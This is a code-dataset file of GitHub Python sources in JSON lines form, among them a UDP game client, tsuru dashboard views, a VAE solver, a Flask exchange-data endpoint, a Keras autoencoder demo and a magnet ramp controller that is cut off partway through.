help=\"Specify optimizer. Choose either: adam, rmsprop or sgd\")\n\n # Get arguments\n args = parser.parse_args()\n\n print(\"Linear\")\n print(LINEAR(args))\n\n print(\"LSTM\")\n print(LSTM(args))\n","repo_name":"rishabhraaj17/MastersThesis","sub_path":"baselinev2/nn/social_lstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22128611135","text":"import socket\nimport time\nfrom curtsies import Input\nfrom threading import Thread\nimport struct\nimport sys\nimport colors\n\n\nclass Client():\n Port = 13117\n BUFF = 1024\n\n def __init__(self, name):\n # UDP Socket\n self.conn_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\n # struct format of messages\n self.udp_format = 'IbH'\n self.magicCookie = 0xfeedbeef\n self.message_type = 0x2\n\n # Enable broadcasting mode\n self.conn_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.conn_udp.bind((\"\", Client.Port))\n\n # variable that helps to determine if the client is still playing or not, updated accordingly.\n self.is_palying = False\n self.name = name\n\n # initializes TCP connection with server in every game session\n def connect_tcp(self, ip, port):\n self.conn_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.conn_tcp.connect((ip, port))\n\n # closes TCP connection with server in every game session\n def close(self):\n self.conn_tcp.close()\n self.conn_tcp = None\n\n # looking for a server mode\n # receiving UDP broadcast messages from servers in order to initiate TCP connection with the first server\n def looking_for_server(self):\n print(f\"{colors.Yellow}Client started, listening for offer requests...{colors.Reset}\")\n data, addr = None, None\n while True:\n data, addr = self.conn_udp.recvfrom(Client.BUFF)\n try:\n # receive only udp messages of the format\n message = struct.unpack(self.udp_format, data)\n except struct.error:\n return\n if message[0] == self.magicCookie and message[1] == self.message_type:\n print(f\"Received offer from {addr[0]}, attempting to connect...\")\n break\n # server's ip - add[0]\n # server's port - message[2]\n self.connecting_to_server(addr[0], int(message[2]))\n\n # try to connect the server with UDP conn in order to participate in the game\n def connecting_to_server(self, ip, port):\n try:\n time.sleep(1)\n self.connect_tcp(ip, port)\n except Exception as e:\n print(f\" connection failed , reconnecting ...\")\n # if connection is failed changes the variable is_playing\n self.is_palying = False\n return\n # send client name's team for the game\n self.conn_tcp.send(self.name.encode('utf-8'))\n self.is_palying = True\n\n # game mode - any key press event is caught and sent to the server\n def game_mode(self):\n with Input(keynames=\"curtsies\", sigint_event=True) as input_generator:\n try:\n while self.is_palying:\n key = input_generator.send(0.1)\n if key:\n print(key)\n self.conn_tcp.send((key + '\\n').encode('utf-8'))\n except Exception:\n return\n\n # at game mode - receiving messages from the server\n # summary messages (game over and more...)\n def recv_msgs(self):\n while True:\n try:\n message = self.conn_tcp.recv(Client.BUFF)\n except:\n print(\"Server disconnected, listening for offer requestes...\")\n self.is_palying = False\n return\n if not message:\n print(\"Server disconnected, listening for offer requestes...\")\n self.is_palying = False\n return\n print(message.decode())\n\n\nif __name__ == \"__main__\":\n # name of client entered by the user at running time\n name = str(sys.argv[1])\n\n client = Client(name)\n\n while True:\n client.looking_for_server()\n\n # game mode!\n if client.is_palying:\n t1 = Thread(target=client.game_mode, daemon=True)\n t2 = Thread(target=client.recv_msgs, daemon=True)\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n client.close()\n","repo_name":"RonitTsysar/hackathon","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23092895433","text":"import requests\n\nfrom datetime import datetime, timedelta\n\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.views.generic import TemplateView\n\nfrom pytz import utc\nfrom dateutil import parser\n\nfrom tsuru_dashboard import settings\nfrom tsuru_dashboard.auth.views import LoginRequiredView\n\n\nclass DashboardView(LoginRequiredView, TemplateView):\n template_name = \"dashboard/dashboard.html\"\n\n\nclass HealingView(LoginRequiredView):\n def get(self, request):\n url = \"{}/docker/healing\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n\n if response.status_code != 200:\n return JsonResponse({\"healing\": 0})\n\n healings = 0\n for healing in response.json():\n end_time = parser.parse(healing['EndTime'])\n if end_time.tzinfo:\n end_time = end_time.astimezone(utc)\n else:\n end_time = utc.localize(end_time)\n now = utc.localize(datetime.utcnow())\n if (now - end_time < timedelta(days=1)):\n healings += 1\n return JsonResponse({\"healing\": healings}, safe=False)\n\n\nclass CloudStatusView(LoginRequiredView):\n def total_apps_and_containers(self):\n url = \"{}/apps\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n total_containers = 0\n\n if response.status_code != 200:\n return 0, total_containers\n\n apps = response.json()\n for app in apps:\n total_containers += len(app['units'])\n\n return len(apps), total_containers\n\n def total_nodes(self):\n url = \"{}/docker/node\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n\n if response.status_code != 200:\n return 0\n\n nodes = response.json()\n return len(nodes['nodes'])\n\n def containers_by_nodes(self, containers, nodes):\n if containers <= 0 or nodes <= 0:\n return 0\n return containers/nodes\n\n def get(self, request):\n total_apps, total_containers = self.total_apps_and_containers()\n total_nodes = self.total_nodes()\n containers_by_nodes = self.containers_by_nodes(total_containers, total_nodes)\n\n data = {\n \"total_apps\": total_apps,\n \"containers_by_nodes\": containers_by_nodes,\n \"total_containers\": total_containers,\n \"total_nodes\": total_nodes,\n }\n return JsonResponse(data, safe=False)\n\n\nclass DeploysView(LoginRequiredView):\n def get(self, request):\n url = \"{}/deploys?limit=1000\".format(settings.TSURU_HOST)\n deploys = requests.get(url, headers=self.authorization).json() or []\n errored = 0\n last_deploys = 0\n for deploy in deploys:\n timestamp = parser.parse(deploy['Timestamp'])\n if timestamp.tzinfo:\n timestamp = timestamp.astimezone(utc)\n else:\n timestamp = utc.localize(timestamp)\n now = utc.localize(datetime.utcnow())\n if (now - timestamp < timedelta(days=1)):\n if deploy['Error']:\n errored += 1\n last_deploys += 1\n return JsonResponse({\"last_deploys\": last_deploys, \"errored\": errored}, safe=False)\n\n\nclass IndexView(LoginRequiredView):\n def get(self, request):\n return HttpResponseRedirect(\"/apps\")\n","repo_name":"tsuru/tsuru-dashboard","sub_path":"tsuru_dashboard/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"53"} +{"seq_id":"31409288626","text":"import psutil\nimport time\n\ndef checkProcessRunning(pid): \n for proc in psutil.process_iter(): \n if proc.pid == pid:\n return True\n \n return False \n\nprocess = int(input('pid: '))\nscript = input('name of script: ')\nwhile checkProcessRunning(process): \n time.sleep(20)\n\nimport os\nos.system('. %s' % script)\n","repo_name":"twardlab/stroke_detection","sub_path":"scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8771833148","text":"from dataset import DisentanglementDataset\nfrom solvers.vae import VAESolver\nfrom typing import Optional\nfrom models import SoftIntroVAE\nfrom ops import (\n gaussian_log_density,\n kl_divergence,\n minibatch_stratified_sampling,\n minibatch_weighted_sampling,\n total_correlation,\n)\n\nfrom contextlib import nullcontext\nimport torch\nfrom torch.optim import Optimizer\nfrom torch import Tensor\nfrom torch.cuda.amp.grad_scaler import GradScaler\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import SingletonWriter\n\n\nclass TCSovler(VAESolver):\n def __init__(\n self,\n dataset: DisentanglementDataset,\n model: SoftIntroVAE,\n batch_size: int,\n optimizer_e: Optimizer,\n optimizer_d: Optimizer,\n recon_loss_type: str,\n beta_kl: float,\n beta_rec: float,\n device: torch.device,\n use_amp: bool,\n grad_scaler: Optional[GradScaler],\n writer: Optional[SummaryWriter] = None,\n test_iter: int = 1000,\n clip: Optional[float] = None,\n ):\n super().__init__(\n dataset,\n model,\n batch_size,\n optimizer_e,\n optimizer_d,\n recon_loss_type,\n beta_kl,\n beta_rec,\n device,\n use_amp,\n grad_scaler,\n writer,\n test_iter,\n clip,\n )\n\n\n def compute_kl_loss(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n return TCSovler._compute_kl_loss_simple(self, z, mu, logvar, reduce, beta, write)\n\n def _compute_kl_loss_simple(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n if beta is None:\n beta = self.beta_kl\n\n dataset_size = len(self.dataset)\n\n kl_loss = kl_divergence(logvar, mu, reduce=reduce)\n tc = total_correlation(\n z, mu, logvar, dataset_size, reduce=reduce\n )\n if write:\n self.write_scalar(SingletonWriter().cur_iter, \"kl_loss_unscaled\", kl_loss)\n return (beta - 1.0) * tc + kl_loss\n\n def _compute_kl_loss_full(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n if beta is None:\n beta = self.beta_kl\n\n batch_size = z.size(0)\n dataset_size = len(self.dataset)\n\n # calculate log q(z|x)\n logqz_condx = gaussian_log_density(z, mu, logvar).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 0\n zeros = torch.zeros_like(z)\n logpz = gaussian_log_density(z, zeros, zeros).sum(dim=1)\n\n log_qz_prob = gaussian_log_density(\n z.unsqueeze(1), mu.unsqueeze(0), logvar.unsqueeze(0)\n )\n logqz_prodmarginals, log_qz = minibatch_stratified_sampling(\n log_qz_prob, batch_size, dataset_size\n )\n\n mi_loss = logqz_condx - log_qz\n tc_loss = log_qz - logqz_prodmarginals\n kl_loss = logqz_prodmarginals - logpz\n\n if reduce == \"mean\":\n mi_loss = torch.mean(mi_loss)\n tc_loss = torch.mean(tc_loss)\n kl_loss = torch.mean(kl_loss)\n\n if SingletonWriter().writer and reduce == \"mean\":\n SingletonWriter().writer.add_scalars(\n \"tc_decomp\",\n { \n \"mi\": mi_loss.data.item(),\n \"tc\": tc_loss.data.item(),\n \"kl\": kl_loss.data.item()\n },\n global_step=SingletonWriter().cur_iter,\n )\n if write:\n self.write_scalar(SingletonWriter().cur_iter, \"kl_loss_unscaled\", mi_loss + tc_loss + kl_loss)\n\n # recombine to get loss:\n return mi_loss + beta * tc_loss + kl_loss\n","repo_name":"meffmadd/intro-tc-vae","sub_path":"solvers/tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18824228642","text":"from flask import jsonify\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.exchanges.select_exchange import GetExchange\n\nclass Klines(Resource):\n\n \n parser = reqparse.RequestParser()\n parser.add_argument('pair',\n type=str,\n required=True,\n help=\"pair cannot be blank!\"\n )\n parser.add_argument('timeframe',\n type=int,\n required=True,\n help=\"timeframe cannot be blank!\"\n )\n parser.add_argument('start_time',\n type=str,\n required=False,\n help=\"start_time!\"\n )\n parser.add_argument('end_time',\n type=str,\n required=False,\n help=\"end_time!\"\n )\n\n @classmethod\n def collect_klines(cls, botid, data):\n ex = GetExchange(botid)\n return ex.get_kline(data['pair'],data['timeframe'],data['start_time'],data['end_time'])\n\n\n @jwt_required()\n def get(self, botid):\n \"\"\"\n get klines\n It is neccessary to send access token\n ---\n tags:\n - exchange data\n parameters:\n - in: path\n botid: botid\n type: string\n required: true\n - in: path\n name: pair like ETHUSDT\n type: string\n required: true\n - in: path\n name: time frame multiply of 1 minutes\n type: int\n required: true\n - in: path\n name: from time must be epoch time\n type: string\n required: false\n - in: path\n name: end time must be epoch time\n type: string\n required: false\n\n responses:\n 200:\n description: A single user item\n schema:\n id: User\n properties:\n pair:\n type: string\n description: like XBTUSDTM\n \n klines:\n type: float\n description: time open high low close volume\n 501:\n \"\"\"\n try:\n data = Klines.parser.parse_args()\n response = self.collect_klines(botid, data)\n return {'pair': data['pair'] , 'FormalName' : response[0], 'klines' : response[1]} , 200\n except Exception as e :\n print(f\"{e}\")\n return {'message': 'bot not found'}, 501","repo_name":"sinaban/bot-backend","sub_path":"resources/exchange/get_klines.py","file_name":"get_klines.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1032614379","text":"\n\ndef stockSpan(arr):\n\n stack, vector = [], []\n for i in range(len(arr)):\n if len(stack) == 0:\n vector.append(-1)\n elif arr[i] < stack[-1][0]:\n vector.append(stack[-1][1])\n elif len(stack) != 0 and arr[i] >= stack[-1][0]:\n while len(stack) != 0 and arr[i] >= stack[-1][0]:\n stack.pop()\n if len(stack) == 0:\n vector.append(-1)\n else:\n vector.append(stack[-1][1])\n stack.append([arr[i], i])\n return vector\n\narr=[100,80,60,70,60,75,85]\nvector=stockSpan(arr)\nprint(vector)\nres=[]\nfor i in range(len(vector)):\n res.append(i-vector[i])\nprint(res)\n\n\n","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"Stack/StockSpan.py","file_name":"StockSpan.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22385132180","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 6 07:48:31 2020\r\n\r\n@author: rejid4996\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn import datasets\r\nfrom IPython.display import SVG\r\nfrom keras.utils.vis_utils import model_to_dot\r\nfrom keras.layers import Input, Dense\r\nfrom keras.models import Model\r\n\r\ndata = datasets.load_digits()\r\n\r\nX_data = data.images\r\ny_data = data.target\r\n\r\nX_data = X_data.reshape(X_data.shape[0], 64)\r\nX_data.max()\r\n\r\n# fit in data instances into interval [0,1]\r\nX_data = X_data / 16.\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size = 0.3, random_state = 777)\r\n\r\nprint(X_train.shape)\r\nprint(X_test.shape)\r\nprint(y_train.shape)\r\nprint(y_test.shape)\r\n\r\n# simple autoencoder\r\n# define coding dimension\r\ncode_dim = 10\r\n\r\ninputs = Input(shape = (X_train.shape[1], ), name = 'input')\r\ncode = Dense(code_dim, activation='relu', name = 'code')(inputs)\r\noutput = Dense(X_train.shape[1], activation = 'softmax', name = 'output')(code)\r\n\r\nauto_encoder = Model(inputs = inputs, outputs = output)\r\nauto_encoder.summary()\r\n\r\nSVG(model_to_dot(auto_encoder,show_shapes=True, dpi=73).create(prog='dot', format='svg'))\r\n\r\n#encoder = Model(inputs = inputs, outputs=code)\r\n#\r\n#decoder_input = Input(shape = (code_dim, ))\r\n#decoder_output = auto_encoder.layers[-1]\r\n#decoder = Model(inputs=decoder_input, outputs = decoder_output(decoder_input))\r\n\r\nauto_encoder.compile(optimizer='adam', loss='binary_crossentropy')\r\n\r\n# training the model\r\nauto_encoder.fit(X_train, X_train, epochs = 300, batch_size = 50, validation_data = (X_test, X_test), verbose = 1)\r\n\r\nencoded = encoder.predict(X_test)\r\ndecoded = decoder.predict(encoded)\r\n\r\nimport pandas as pd\r\npd.DataFrame(encoded[:5])\r\n\r\nplt.figure(figsize = (10,4))\r\nn = 5\r\nfor i in range(n):\r\n # visualizing test data instances\r\n ax = plt.subplot(2, n, i+1)\r\n plt.imshow(X_test[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n \r\n # visualizing encode-decoded test data instances\r\n ax = plt.subplot(2, n, i+n+1)\r\n plt.imshow(decoded[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nplt.show()\r\n\r\n#%%\r\n## Deep autoencoder\r\n\r\ndef encoder_decoder(code_dim = 10):\r\n inputs = Input(shape = (X_train.shape[1],))\r\n code = Dense(50, activation= 'relu')(inputs)\r\n code = Dense(50, activation = 'relu')(code)\r\n code = Dense(code_dim, activation = 'relu')(code)\r\n \r\n outputs = Dense(50, activation = 'relu')(code)\r\n outputs = Dense(50, activation = 'relu')(outputs)\r\n outputs = Dense(X_train.shape[1], activation = 'sigmoid')(outputs)\r\n \r\n auto_encoder = Model(inputs = inputs, outputs = outputs)\r\n auto_encoder.compile(optimizer = 'adam', loss = 'binary_crossentropy')\r\n \r\n return auto_encoder\r\n\r\nauto_encoder = encoder_decoder()\r\n\r\nauto_encoder.fit(X_train, X_train, epochs = 1000, batch_size = 50, validation_data = (X_test, X_test), verbose = 1)\r\ndecoded = auto_encoder.predict(X_test)\r\n\r\nplt.figure(figsize = (10,4))\r\nn = 5\r\nfor i in range(n):\r\n # visualizing test data instances\r\n ax = plt.subplot(2, n, i+1)\r\n plt.imshow(X_test[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n \r\n # visualizing encode-decoded test data instances\r\n ax = plt.subplot(2, n, i+n+1)\r\n plt.imshow(decoded[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nplt.show()","repo_name":"dreji18/Autoencoders","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74606988327","text":"#Author: Richard Mattish\r\n#Last Updated: 02/27/2023\r\n\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport platform\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\nimport matplotlib.animation as animation\r\nimport time\r\nimport webbrowser\r\nimport serial\r\nimport re\r\nimport datetime\r\n\r\n\r\n#Defines location of the Desktop as well as font and text size for use in the software\r\ndesktop = os.path.expanduser(\"~\\Desktop\")\r\nfont1 = ('Helvetica', 18)\r\nfont2 = ('Helvetica', 16)\r\nfont3 = ('Helvetica', 14)\r\nfont4 = ('Helvetica', 12)\r\ntextSize = 20\r\n\r\ntoday = datetime.date.today().strftime(\"%m-%d-%y\")\r\nnow = datetime.datetime.now().strftime(\"%H%M\")\r\nlogPath = 'C:/Users/CUEBIT/Documents/status_logs/magnet_ramp_logs/'\r\nlogName = f'Log {today} {now}.txt'\r\n\r\nnow = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\nlog = open(logPath+logName,'w')\r\nlog.write(f'Date: {today}\\n')\r\nlog.write(f'Log started at {now}\\n\\n')\r\nlog.close()\r\n\r\ndef startProgram(root=None):\r\n instance = rampController()\r\n instance.startGui(root)\r\n\r\nclass rampController:\r\n def __init__(self): \r\n self.port = None\r\n self.stage1Temp = None\r\n self.stage2Temp = None\r\n self.magnetATemp = None\r\n self.magnetBTemp = None\r\n self.switchTemp = None\r\n self.sqlFile = None\r\n self.state = None\r\n self.interlock = False\r\n self.status = None\r\n self.ser = None\r\n self.process = None\r\n self.switch = False\r\n\r\n self.initialTime = None\r\n self.time_array = []\r\n self.current_array = []\r\n\r\n self.rate1 = None\r\n self.rate2 = None\r\n self.rate3 = None\r\n self.rate4 = None\r\n self.set1 = None\r\n self.set2 = None\r\n self.set3 = None\r\n self.set4 = None\r\n\r\n self.t1 = None\r\n\r\n\r\n #Loads the variables com and R from the variables file, and creates the file if none exists\r\n try:\r\n f = open('variables', 'r')\r\n variables = f.readlines()\r\n self.port = str(variables[0].split('=')[1]).strip()\r\n self.sqlFile = str(variables[1].split('=')[1]).strip()\r\n self.rate1 = float(variables[2].split(',')[0].split('=')[1])\r\n self.set1 = float(variables[2].split(',')[1].split('=')[1])\r\n self.rate2 = float(variables[3].split(',')[0].split('=')[1])\r\n self.set2 = float(variables[3].split(',')[1].split('=')[1])\r\n self.rate3 = float(variables[4].split(',')[0].split('=')[1])\r\n self.set3 = float(variables[4].split(',')[1].split('=')[1])\r\n self.rate4 = float(variables[5].split(',')[0].split('=')[1])\r\n self.set4 = float(variables[5].split(',')[1].split('=')[1])\r\n\r\n if self.set4 > 108.1:\r\n self.log_entry(f\"Error with max current {self.set4}, reducing to 108.1!\")\r\n self.set4 = 108.1\r\n\r\n self.log_entry('Getting variables from variables file')\r\n \r\n\r\n except:\r\n self.port = 'COM6'\r\n self.sqlFile = 'data'\r\n self.rate1 = 0.292\r\n self.set1 = 36\r\n self.rate2 = 0.219\r\n self.set2 = 72\r\n self.rate3 = 0.123\r\n self.set3 = 90\r\n self.rate4 = 0.052\r\n self.set4 = 108.1\r\n f = open(\"variables\",'w')\r\n f.write(f'port={self.port}\\nsqlFile={self.sqlFile}\\nrate1={self.rate1},set1={self.set1}\\nrate2={self.rate2},set2={self.set2}\\\r\n \\nrate3={self.rate3},set3={self.set3}\\nrate4={self.rate4},set4={self.set4}')\r\n f.close()\r\n\r\n self.log_entry('Unsuccessful: Writing new variables file and resetting all variables to default values')\r\n\r\n def get_settings(self):\r\n # Return an array or collection of settings here\r\n # Module can have more than 1 set of settings.\r\n return []\r\n\r\n def get_menus(self):\r\n\r\n # This returns what menus (except for settings) should be made for this\r\n # module. This example adds a \"Misc\" dropdown, with 3 values, and 1 separator\r\n \r\n\r\n _file_menu = module.Menu()\r\n # Define what the button does\r\n _file_menu._options[\"ramp_controller\"] = self.startGui\r\n # Defines order in list (only 1 here though)\r\n _file_menu._opts_order.append(\"ramp_controller\")\r\n # Describes what it does\r\n _file_menu._helps[\"ramp_controller\"] = 'Says I Ran a Thing'\r\n # What you see in the list to click on\r\n _file_menu._labels[\"ramp_controller\"] = \"Ramp controller\"\r\n # What menu to add this to\r\n _file_menu._label = \"File\"\r\n\r\n # Returns an array of menus (only 1 in this case)\r\n return [_file_menu]\r\n\r\n def log_entry(self, text):\r\n now = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n log = open(logPath+logName, 'a')\r\n log.write(f'{now}\\t{text}\\n\\n')\r\n log.close()\r\n\r\n\r\n def start_ramp(self, dir): \r\n if not self.interlock:\r\n self.interlock = True\r\n self.time_array = []\r\n self.current_array = []\r\n self.state = 'start'\r\n\r\n self.log_entry(f'state={self.state}')\r\n\r\n if self.ser is None:\r\n try:\r\n self.ser = serial.Serial(self.port, 9600, timeout=3)\r\n except Exception as err:\r\n print(err)\r\n self.interlock = False\r\n helpMessage ='Could not connect to magnet controller. Check connection and try again'\r\n\r\n self.log_entry(helpMessage)\r\n\r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n return\r\n self.initialTime = time.time()\r\n\r\n if dir == 'up':\r\n self.log_entry('Ramp Up Process Started')\r\n\r\n self.process = 'energize'\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: Energizing B', font = font1, bg = 'white', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'yellow')\r\n process1= Label(self.status, text = 'Heating Switch', font = font3, bg = 'yellow')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process2b = Label(self.status, text = 'R = 0.000 A/s', font = font4, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'white')\r\n process4 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process4b = Label(self.status, text = 'R = 0.5 A/s', font = font4, bg = 'white')\r\n stage4.place(relx=0.35, rely=0.8, anchor = E)\r\n process4.place(relx=0.35, rely=0.8, anchor = W)\r\n process4b.place(relx=0.35, rely=0.9, anchor=W)\r\n\r\n self.ramp_up()\r\n\r\n elif dir == 'down':\r\n self.log_entry('Ramp Down Process Started')\r\n self.process = 'de-energize'\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: De-energizing B', font = font1, bg = 'white', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'yellow')\r\n process1 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'yellow')\r\n process1b = Label(self.status, text = 'R = 0.5 A/s', font = font4, bg = 'yellow')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n process1b.place(relx=0.35, rely=0.4, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process3b = Label(self.status, text = 'R = -0.1 A/s', font = font4, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'white')\r\n process4 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage4.place(relx=0.35, rely=0.85, anchor = E)\r\n process4.place(relx=0.35, rely=0.85, anchor = W)\r\n\r\n self.ramp_down()\r\n else:\r\n helpMessage ='Cannot start another process while the magnet is being ramped' \r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n\r\n def ramp_up(self):\r\n if self.state == 'abort':\r\n return\r\n \r\n if self.state == 'start':\r\n\r\n # Set the ramp target to set4.\r\n self.ser.write(str.encode(f'SET MID {self.set4/2:.1f}\\n'))\r\n reading = self.ser.readline().decode()\r\n self.ser.write(str.encode(f'SET MAX {self.set4:.1f}\\n'))\r\n reading = self.ser.readline().decode()\r\n\r\n #Turns the heater on to warm up the switch\r\n self.ser.write(str.encode('H1?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: ON', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn on')\r\n self.log_entry(f'Error: Heater did not turn on\\n{reading}')\r\n return\r\n self.state = 'warm_up'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = True\r\n \r\n elif self.state == 'warm_up':\r\n self.check_temperature('up')\r\n \r\n elif self.state == 'start_ramp':\r\n #Starts the current ramping upward\r\n self.ser.write(str.encode(f'SR{self.rate1}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.ser.write(str.encode('R!\\n'))\r\n self.state = 'ramp_1'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'white')\r\n process1= Label(self.status, text = 'Heating Switch', font = font3, bg = 'white')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'yellow')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'yellow')\r\n process2b = Label(self.status, text = f'R = {self.rate1} A/s', font = 